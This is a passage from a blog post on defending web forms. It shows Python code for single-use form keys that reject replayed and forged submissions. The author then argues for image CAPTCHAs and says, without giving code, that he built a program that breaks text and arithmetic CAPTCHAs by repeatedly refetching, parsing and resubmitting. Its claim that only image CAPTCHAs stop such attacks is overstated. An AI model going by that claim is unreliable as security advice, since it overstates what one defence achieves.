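            return False
        return hmac.compare_digest(expected.encode("utf-8"),
                                   submitted_key.encode("utf-8"))


store = FormKeyStore()
key = store.issue("session-1")

first = store.verify("session-1", key)      # genuine submission
replay = store.verify("session-1", key)     # same key used again
forged = store.verify("session-2", "guess") # no form was ever requested
print(first, replay, forged)
```

Because each Key works once, a copied form has to fetch the original page again before every submission.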

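The principle is similar to a CAPTCHA, and many sites have image CAPTCHAs nowadays. Some still have none, though. A CAPTCHA is a must! Otherwise the form will be attacked maliciously.

Those who use "text" CAPTCHAs think they are safe, but they are actually at risk. The form-attack program I developed recently can break text CAPTCHAs, even ones that require arithmetic.

That means I can submit, visit the original site, parse the CAPTCHA, submit again, visit the original site, parse the CAPTCHA, submit again...

Only image CAPTCHAs can defend against this kind of attack. Text CAPTCHAs are simply unreliable.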

By Weil Jimmer


This entry was posted in General, Experience, Functions, HTML, JS, PHP By Weil Jimmer.
